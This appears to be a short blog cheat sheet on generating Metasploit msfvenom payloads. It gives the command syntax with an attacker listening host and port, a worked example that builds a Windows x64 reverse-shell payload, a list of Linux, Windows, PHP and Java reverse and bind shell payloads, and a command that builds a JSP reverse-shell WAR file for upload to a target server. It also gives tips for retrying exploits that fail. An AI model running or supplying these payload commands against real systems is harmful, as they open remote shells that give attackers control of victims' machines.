Metasploit msfvenom Payloads

The payloads below are commonly used and can be used from within Metasploit. They can also be used outside of metasploit by running msfvenom from the command line as follows:

msfvenom -p [payload name] -a [x64 or x86] –platform [windows/linux] -e [encryptor] -f [optional output format] -o [optional output file name] EXITFUNC=thread LHOST=[listening/ attacker host] LPORT=[listening port]

For example, generating a basic shellcode payload for a Windows x64 system would look something like this:

msfvenom -p windows/x64/shell_reverse_tcp -a x64 –platform windows -e x64/tor -f raw -o meterpreterx64.bin EXITFUNC=thread LHOST= LPORT=4444

If your exploit fails while using any one of the meterpreter payloads re-try the exploit using a non meterpreter payload such as ‘windows/shell/reverse_tcp’

Too many times I assumed an exploit was not working only to find that the host I was trying to exploit just didn’t like my meterpreter payload…

Payload Name
  • payload/linux/x86/meterpreter_reverse_tcp
  • payload/linux/x86/shell/reverse_tcp                                               
  • Windows/meterpreter/reverse_https
  • windows/shell/reverse_tcp  
  • windows/x64/shell_reverse_tcp


  • generic/shell_reverse_tcp  


  • php/reverse_php
  • php/meterpreter_reverse_tcp php/meterpreter/reverse_tcp
  • php/bind_php
  • php/exec  


  • java/jsp_shell_reverse_tcp

            -Java War Shell-

            msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f   

            war > iwonthe.war

            File can be uploaded wherever WAR files are accepted






Read More

Leave a Reply

Your email address will not be published. Required fields are marked *